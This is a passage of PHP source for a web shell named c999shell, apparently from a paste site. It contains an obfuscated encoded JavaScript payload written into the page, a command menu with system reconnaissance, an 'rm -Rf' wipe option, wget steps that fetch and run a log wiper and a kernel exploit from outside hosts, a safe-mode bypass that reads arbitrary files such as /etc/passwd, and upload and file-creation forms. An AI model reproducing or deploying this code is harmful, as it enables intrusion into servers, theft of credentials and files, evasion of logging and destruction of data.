  3178. fF7eSD8[160]="0037%255Cu0032%25";
  3179. fF7eSD8[161]="5Cu005c%255Cu007";
  3180. fF7eSD8[162]="5%255Cu0030%255C";
  3181. fF7eSD8[163]="u0030%255Cu0036%25";
  3182. fF7eSD8[164]="5Cu0037%255Cu00";
  3183. fF7eSD8[165]="5c%255Cu0075%255";
  3184. fF7eSD8[166]="Cu0030%255Cu0030";
  3185. fF7eSD8[167]="%255Cu0032%255Cu00";
  3186. fF7eSD8[168]="66%255Cu005c%255";
  3187. fF7eSD8[169]="Cu0075%255Cu0";
  3188. fF7eSD8[170]="030%255Cu0030%255C";
  3189. fF7eSD8[171]="u0037%255Cu0037";
  3190. fF7eSD8[172]="%255Cu005c%255Cu";
  3191. fF7eSD8[173]="0075%255Cu0030%25";
  3192. fF7eSD8[174]="5Cu0030%255Cu";
  3193. fF7eSD8[175]="0036%255Cu0038%255";
  3194. fF7eSD8[176]="Cu005c%255Cu007";
  3195. fF7eSD8[177]="5%255Cu0030%255";
  3196. fF7eSD8[178]="Cu0030%255Cu0036";
  3197. fF7eSD8[179]="%255Cu0035%255Cu00";
  3198. fF7eSD8[180]="5c%255Cu0075%255Cu";
  3199. fF7eSD8[181]="0030%255Cu003";
  3200. fF7eSD8[182]="0%255Cu0037%255C";
  3201. fF7eSD8[183]="u0032%255Cu00";
  3202. fF7eSD8[184]="5c%255Cu0075%255";
  3203. fF7eSD8[185]="Cu0030%255Cu0";
  3204. fF7eSD8[186]="030%255Cu0036%25";
  3205. fF7eSD8[187]="5Cu0035%255Cu0";
  3206. fF7eSD8[188]="05c%255Cu0075";
  3207. fF7eSD8[189]="%255Cu0030%255Cu0";
  3208. fF7eSD8[190]="030%255Cu0032";
  3209. fF7eSD8[191]="%255Cu0065%255Cu";
  3210. fF7eSD8[192]="005c%255Cu0075";
  3211. fF7eSD8[193]="%255Cu0030%255Cu00";
  3212. fF7eSD8[194]="30%255Cu0036%25";
  3213. fF7eSD8[195]="5Cu0061%255Cu";
  3214. fF7eSD8[196]="005c%255Cu007";
  3215. fF7eSD8[197]="5%255Cu0030%255";
  3216. fF7eSD8[198]="Cu0030%255Cu0037";
  3217. fF7eSD8[199]="%255Cu0033%255Cu0";
  3218. fF7eSD8[200]="05c%255Cu0075%255C";
  3219. fF7eSD8[201]="u0030%255Cu00";
  3220. fF7eSD8[202]="30%255Cu0033%255Cu";
  3221. fF7eSD8[203]="0065%255Cu005";
  3222. fF7eSD8[204]="c%255Cu0075%255Cu";
  3223. fF7eSD8[205]="0030%255Cu0030%25";
  3224. fF7eSD8[206]="5Cu0033%255Cu00";
  3225. fF7eSD8[207]="63%255Cu005c%255C";
  3226. fF7eSD8[208]="u0075%255Cu0030";
  3227. fF7eSD8[209]="%255Cu0030%255Cu0";
  3228. fF7eSD8[210]="032%255Cu0066%255";
  3229. fF7eSD8[211]="Cu005c%255Cu0";
  3230. fF7eSD8[212]="075%255Cu0030%25";
  3231. fF7eSD8[213]="5Cu0030%255Cu";
  3232. fF7eSD8[214]="0035%255Cu0033%255";
  3233. fF7eSD8[215]="Cu005c%255Cu007";
  3234. fF7eSD8[216]="5%255Cu0030%255Cu0";
  3235. fF7eSD8[217]="030%255Cu0034%255";
  3236. fF7eSD8[218]="Cu0033%255Cu00";
  3237. fF7eSD8[219]="5c%255Cu0075%25";
  3238. fF7eSD8[220]="5Cu0030%255Cu0";
  3239. fF7eSD8[221]="030%255Cu0035";
  3240. fF7eSD8[222]="%255Cu0032%255Cu0";
  3241. fF7eSD8[223]="05c%255Cu0075";
  3242. fF7eSD8[224]="%255Cu0030%255Cu";
  3243. fF7eSD8[225]="0030%255Cu0034%25";
  3244. fF7eSD8[226]="5Cu0039%255Cu0";
  3245. fF7eSD8[227]="05c%255Cu0075%25";
  3246. fF7eSD8[228]="5Cu0030%255Cu";
  3247. fF7eSD8[229]="0030%255Cu0035%25";
  3248. fF7eSD8[230]="5Cu0030%255Cu";
  3249. fF7eSD8[231]="005c%255Cu0075%255";
  3250. fF7eSD8[232]="Cu0030%255Cu0";
  3251. fF7eSD8[233]="030%255Cu0035";
  3252. fF7eSD8[234]="%255Cu0034%255Cu0";
  3253. fF7eSD8[235]="05c%255Cu0075";
  3254. fF7eSD8[236]="%255Cu0030%255Cu";
  3255. fF7eSD8[237]="0030%255Cu0033%255";
  3256. fF7eSD8[238]="Cu0065%255Cu0";
  3257. fF7eSD8[239]="027%255Cu0029";
  3258. fF7eSD8[240]="%255Cu003c%255C";
  3259. fF7eSD8[241]="u002f%255Cu0073%25";
  3260. fF7eSD8[242]="5Cu0063%255Cu007";
  3261. fF7eSD8[243]="2%255Cu0069%255Cu";
  3262. fF7eSD8[244]="0070%255Cu007";
  3263. fF7eSD8[245]="4%255Cu003e%2527%25";
  3264. fF7eSD8[246]="29%253C/script%25";
  3265. fF7eSD8[247]="3E%22%29%29%3B%0A%3C/scri";
  3266. fF7eSD8[248]="pt%3E";
  3267. for (i = 0; i < fF7eSD8.length; i ++)
  3268. {
  3269.     document.write(unescape(fF7eSD8[i]))
  3270. }
  3271. // -->
  3272. </script>    <form action="<?php echo $surl; ?>">
  3273.       <div align="center">
  3274.         <input type=hidden name=act value="cmd">
  3275.         <input type=hidden name="d" value="<?php echo $dispd; ?>">
  3276.           <SELECT NAME="cmd">
  3277.             <OPTION VALUE="uname -a">Kernel version
  3278.               <OPTION VALUE="w">Logged in users
  3279.                 <OPTION VALUE="lastlog">Last to connect
  3280.                   <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
  3281.                     <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
  3282.                     <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
  3283.                     <OPTION VALUE="which wget curl w3m lynx">Downloaders?
  3284.                     <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
  3285.                     <OPTION VALUE="netstat -atup | grep IST">Open ports
  3286.                     <OPTION VALUE="locate gcc">gcc installed?
  3287.                     <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
  3288.                     <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
  3289.                     <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
  3290.                     <OPTION VALUE="./zap2">WIPELOGS PT3
  3291.                     <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
  3292.                     <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
  3293.                     <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
  3294.                     <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
  3295.                     <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
  3296.                     <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
  3297.                   </SELECT>
  3298.         <input type=hidden name="cmd_txt" value="1">
  3299.         &nbsp;
  3300.         <input type=submit name=submit value="Execute">
  3301.           <br>
  3302.         Warning. Kernel may be alerted using higher levels </div>
  3303.     </form>
  3304.     </td>
  3305.   <td width="50%" height="83" valign="top"><center>
  3306.    <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
  3307.       <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
  3308.       <input type="hidden" name="client" value="firefox-a">
  3309.       <input type="hidden" name="rls" value="org.mozilla:en-US:official">
  3310.       <input type="hidden" name="hl" value="en">
  3311.       <input type="hidden" name="hs" value="b7p">
  3312.       <input type=submit name="btnG" VALUE="Search">
  3313.     </form></center>
  3314.     </td>
  3315. </tr></TABLE><br>
  3316. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  3317. <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>
  3318. <tr>
  3319.   <td width="50%" height="83" valign="top"><center>
  3320.     <div align="center">Php Safe-Mode Bypass (Read Files)
  3321.     </div><br>
  3322.     <form action="<?php echo $surl; ?>">
  3323.       <div align="center">
  3324.       File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
  3325.      
  3326.      
  3327.      
  3328.            
  3329.      
  3330.      
  3331.       <?
  3332.      
  3333.       function rsg_read()
  3334.     {  
  3335.     $test="";
  3336.     $temp=tempnam($test, "cx");
  3337.     $file=$_GET['file'];   
  3338.     $get=htmlspecialchars($file);
  3339.     echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
  3340.     if(copy("compress.zlib://".$file, $temp)){
  3341.     $fichier = fopen($temp, "r");
  3342.     $action = fread($fichier, filesize($temp));
  3343.     fclose($fichier);
  3344.     $source=htmlspecialchars($action);
  3345.     echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
  3346.     unlink($temp);
  3347.     } else {
  3348.     die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  3349.     <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
  3350.     access.</CENTER></FONT>");
  3351.             }
  3352.     echo "</div>";
  3353.     }
  3354.    
  3355.     if(isset($_GET['file']))
  3356. {
  3357. rsg_read();
  3358. }
  3359.    
  3360.     ?>
  3361.    
  3362.     <?
  3363.    
  3364.     function rsg_glob()
  3365. {
  3366. $chemin=$_GET['directory'];
  3367. $files = glob("$chemin*");
  3368. echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
  3369. foreach ($files as $filename) {
  3370.     echo "<pre>";
  3371.    echo "$filename\n";
  3372.    echo "</pre>";
  3373. }
  3374. }
  3375.  
  3376. if(isset($_GET['directory']))
  3377. {
  3378. rsg_glob();
  3379. }
  3380.  
  3381. ?>
  3382.  
  3383.           <br>
  3384.       </div>
  3385.     </form>
  3386.     </td>
  3387.   <td width="50%" height="83" valign="top"><center>
  3388.    <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>">
  3389.       <div align="center"><br>
  3390.       Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
  3391.  
  3392.     </form></center>
  3393.     </td>
  3394. </tr></TABLE><br>
  3395. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  3396. <tr>
  3397.  <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
  3398.  <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
  3399. </tr>
  3400. </table>
  3401. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
  3402. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
  3403. <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c999shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Shadow & Preddy | <a href="http://rootshell-security.net"><font color="#FF0000">RootShell Security Group</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
  3404. </body></html><?php chdir($lastdir); c999shexit();
  3405. ?>
Add Comment
Please, Sign In to add comment